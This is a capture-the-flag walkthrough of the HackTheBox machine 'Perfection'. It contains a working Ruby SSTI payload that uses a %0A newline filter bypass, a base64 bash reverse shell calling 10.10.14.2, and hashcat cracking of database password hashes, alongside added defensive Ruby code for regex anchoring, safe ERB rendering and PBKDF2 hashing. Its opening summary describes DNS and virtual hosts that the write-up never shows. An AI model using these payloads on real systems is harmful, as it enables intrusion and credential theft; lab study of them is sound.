htb: perfection walkthrough

July 12, 2024
Author: TheRedeemed1
Category: Linux · Easy
Release: 02 Mar, 2024

Easy Linux machine featuring a DNS server and multiple virtual hosts, each requiring different steps to gain a foothold.

Perfection features a grade calculator with input filtering, bypassed via newline injection. Exploiting Ruby SSTI grants execution, leading to a database of hashes and a password format hint. Using Hashcat, I’ll crack them for root access. In Beyond Root, we analyze the Ruby webserver and SSTI.

Recon

Nmap scan

nmap -p 22,80 -sC -sV perfection.htb
 
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 80e479e85928df952dad574a4604ea70 (ECDSA)
|   256 e9ea0c1d8613ed95a9d00bc822e4cfe9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBqNwnyqGqYHNSIjQnv7hRU0UC9Q4oB4g9Pfzuj2qcG4
80/tcp open  http    syn-ack nginx
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Weighted Grade Calculator
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Information Disclosure

Page source of perfection.htb, which discloses the backend in its footer:
<!-- Footer -->
 <footer>
<p class="copyright">Copyright Secure Student Tools. All rights reserved<br><b>Powered by WEBrick 1.7.0</b></p>
</footer>

Base64-encoded reverse shell (the first `+` in the output is URL-encoded to `%2b` so it survives the form body)

base64 <<< "bash -i >& /dev/tcp/10.10.14.2/1234 0>&1" | sed 's/\+/\%2b/'
YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yLzEyMzQgMD4mMQo=

Payload Injection - Base64 - Reverse Shell

Burp Repeater request. The important part is %0A, the URL-encoded newline: it slips past the input filter and lets anything after it be injected, including the reverse shell.

Burp Suite Payload
category1=History%0A<%25%3dsystem("echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yLzEyMzQgMD4mMQo=+|+base64+-d+|+bash");%25>&grade1=1&weight1=100&category2=00&grade2=0&weight2=0&category3=0&grade3=0&weight3=0&category4=0&grade4=0&weight4=0&category5=0&grade5=0&weight5=0
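Why the newline gets past the filter, as an added example that is not code from the Perfection box or from the writeup's author: in Ruby, `^` and `$` anchor to line boundaries, so a filter written with them accepts any multi-line value whose first line is clean, while `\A` and `\z` anchor to the whole string. The filter patterns, the `render_category_*` functions and the template below are hypothetical stand-ins for the real app, shown to contrast splicing input into ERB source with rendering it as escaped data.

```ruby
# Added example, not the box's code: newline bypass of a ^...$ filter in Ruby,
# the \A...\z fix, and unsafe vs safe ERB rendering of the validated value.
require 'erb'
require 'cgi'

# ^ and $ match at the start and end of ANY LINE, so "History\n<%= ... %>"
# passes as long as its first line is alphanumeric.
LOOSE_FILTER  = /^[a-zA-Z0-9]+$/
# \A and \z anchor to the start and end of the whole string
# (\z rather than \Z, because \Z still tolerates one trailing newline).
STRICT_FILTER = /\A[a-zA-Z0-9]+\z/

def loose_ok?(value)
  LOOSE_FILTER.match?(value)
end

def strict_ok?(value)
  STRICT_FILTER.match?(value)
end

# Vulnerable pattern: the user's value is spliced into the ERB *source*, so
# any <%= %> tag inside it is evaluated as Ruby (the SSTI class of bug).
def render_category_unsafe(category)
  ERB.new("<p>Category: #{category}</p>").result
end

# Hardened pattern: the template is fixed, the value arrives as data through
# a binding, and it is HTML-escaped on output. Tags in the input stay text.
SAFE_TEMPLATE = ERB.new('<p>Category: <%= CGI.escapeHTML(category) %></p>')

def render_category_safe(category)
  SAFE_TEMPLATE.result_with_hash(category: category)
end

# Request handling with both layers: reject what the strict filter disallows,
# then render the survivor through the fixed template.
def handle_category(value)
  return [400, 'invalid category'] unless strict_ok?(value)

  [200, render_category_safe(value)]
end

if __FILE__ == $PROGRAM_NAME
  probe = "History\n<%= 7 * 7 %>" # constructed sample input
  puts "loose filter accepts:  #{loose_ok?(probe)}"  # true
  puts "strict filter accepts: #{strict_ok?(probe)}" # false
  puts render_category_unsafe(probe)                 # second line shows 49
  puts render_category_safe(probe)                   # tag survives as escaped text
  p handle_category(probe)                           # [400, "invalid category"]
end
```

The `7 * 7` probe is the usual way to confirm a template is evaluating input: the unsafe renderer prints `49`, the safe one prints the tag back as `&lt;%= 7 * 7 %&gt;`. Note that escaping alone is not the fix; the decisive change is that `category` never becomes part of the template source.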

Foothold - Susan

nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.253 57674
bash: cannot set terminal process group (1000): Inappropriate ioctl for device
bash: no job control in this shell
susan@perfection:~/ruby_app$
susan@perfection:~$ id
uid=1001(susan) gid=1001(susan) groups=1001(susan), 27(sudo)
susan@perfection:~$

Susan is in the sudo group, but sudo still requires her password.

Migration - SQLite database

The Migration directory holds an SQLite database with password hashes for several users:

pupilpath_credentials.db
susan@perfection:~/Migration$ sqlite3 pupilpath_credentials.db 
SQLite version 3.37.2
Enter ".help" for usage hints.
sqlite> .tables
users
sqlite> select * from users;
1|Susan Miller|abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f
2|Tina Smith|dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57
3|Harry Tyler|d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393
4|David Lawrence|ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a
5|Stephen Locke|154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8
usernames.txt
Susan Miller
Tina Smith
Harry Tyler
David Lawrence
Stephen Locke
passwords.txt
abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f
dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57
d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393
ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a
154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8

We copied the names and hashes into two text files, usernames.txt and passwords.txt.

Hashcat brute-forcing

hashcat -m 1400 susan_hash.txt -a 3 'susan_nasus_?d?d?d?d?d?d?d?d?d'
 
hashcat (v6.2.6) starting
 
OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux) - Platform 
=========================================================
* Device #1: gameboy
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
 
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Brute-Force
* Raw-Hash
 
abeb6f8e<SNIP>9023f:susan_nasus_413759210
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1400 (SHA2-256)
Hash.Target......: abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a3019934...39023f
Time.Started.....: Wed Jul 17 00:34:36 2024 (22 secs)
Time.Estimated...: Wed Jul 17 00:34:58 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: susan_nasus_?d?d?d?d?d?d?d?d?d [21]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 14500.5 kH/s (0.51ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 324567040/1000000000 (32.46%)
Rejected.........: 0/324567040 (0.00%)
Restore.Point....: 324550656/1000000000 (32.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: susan_nasus_354540610 -> susan_nasus_700440610
 
Started: Wed Jul 17 00:34:28 2024
Stopped: Wed Jul 17 00:34:27 2024
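The numbers behind that 22-second crack, and the storage scheme that would have resisted it, as an added example covering both the Migration database above and the Hashcat run; this is not code from the writeup or from the box. The weak scheme is the one the database actually uses (unsalted single-round SHA-256, hashcat mode 1400); the mask keyspace and time functions reproduce hashcat's own arithmetic for the `?d` mask and the reported 14500.5 kH/s; the PBKDF2 iteration count, the record format and the sample password are assumptions made for the example.

```ruby
# Added example, not the box's code: why unsalted SHA-256 of a patterned
# password falls in seconds, and a salted, iterated replacement.
require 'digest'
require 'openssl'
require 'securerandom'

# Scheme found in pupilpath_credentials.db: unsalted, single-round SHA-256.
def weak_hash(password)
  Digest::SHA256.hexdigest(password)
end

# Candidate count for a hashcat mask. Literal text such as "susan_nasus_"
# contributes nothing; only the ?x placeholders multiply the keyspace.
CHARSET_SIZES = { 'd' => 10, 'l' => 26, 'u' => 26, 's' => 33, 'a' => 95 }.freeze

def mask_keyspace(mask)
  mask.scan(/\?([dlusa])/).flatten.reduce(1) { |acc, c| acc * CHARSET_SIZES[c] }
end

# Worst-case seconds to exhaust the mask at a given hash rate (H/s).
def seconds_to_exhaust(mask, hashes_per_second)
  mask_keyspace(mask).fdiv(hashes_per_second)
end

# Hardened scheme: per-user random salt plus a deliberately slow KDF
# (PBKDF2-HMAC-SHA256 via Ruby's OpenSSL binding). Every guess now costs
# ITERATIONS hash computations and must be repeated per user.
ITERATIONS = 600_000 # assumption: current OWASP guidance for PBKDF2-HMAC-SHA256

def hash_password(password)
  salt = SecureRandom.random_bytes(16)
  dk = OpenSSL::PKCS5.pbkdf2_hmac(password, salt, ITERATIONS, 32, 'sha256')
  ['pbkdf2-sha256', ITERATIONS, salt.unpack1('H*'), dk.unpack1('H*')].join('$')
end

# Constant-time comparison so verification does not leak how many leading
# bytes of the derived key matched.
def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize

  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

def verify_password(stored, candidate)
  algo, iters, salt_hex, dk_hex = stored.split('$')
  return false unless algo == 'pbkdf2-sha256'

  salt = [salt_hex].pack('H*')
  dk = OpenSSL::PKCS5.pbkdf2_hmac(candidate, salt, iters.to_i, 32, 'sha256')
  constant_time_equal?(dk.unpack1('H*'), dk_hex)
end

if __FILE__ == $PROGRAM_NAME
  mask = 'susan_nasus_?d?d?d?d?d?d?d?d?d'
  rate = 14_500_500 # the 14500.5 kH/s reported by the hashcat run above
  puts "keyspace: #{mask_keyspace(mask)} candidates"
  puts "worst case, raw SHA-256 at #{rate} H/s: #{seconds_to_exhaust(mask, rate).round(1)} s"
  puts "same mask, PBKDF2 x#{ITERATIONS}: #{(seconds_to_exhaust(mask, rate.fdiv(ITERATIONS)) / 86_400).round} days"
  stored = hash_password('example-password') # constructed sample, not a real credential
  puts "verify correct: #{verify_password(stored, 'example-password')}"
  puts "verify wrong:   #{verify_password(stored, 'guess')}"
end
```

The mask covers one billion candidates, which the writeup's device exhausts in about 69 seconds (hashcat found the match at 32%). With the same rate divided by 600,000 iterations the same search takes on the order of a year per user, and the salt stops one run from testing all five hashes at once. The pattern itself is still the root problem: a slow KDF buys time, it does not make `susan_nasus_` plus nine digits a good password.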

Root flag

susan@perfection:~$ sudo su
[sudo] password for susan: 
root@perfection:/home/susan# cd /root
root@perfection:~# ls
root.txt
root@perfection:~# cat root.txt
f57***************8ea534
root@perfection:~#

Notes

The newline (\n), URL-encoded as %0A, was the key bypass that allowed injecting a payload with a reverse shell past the input filter.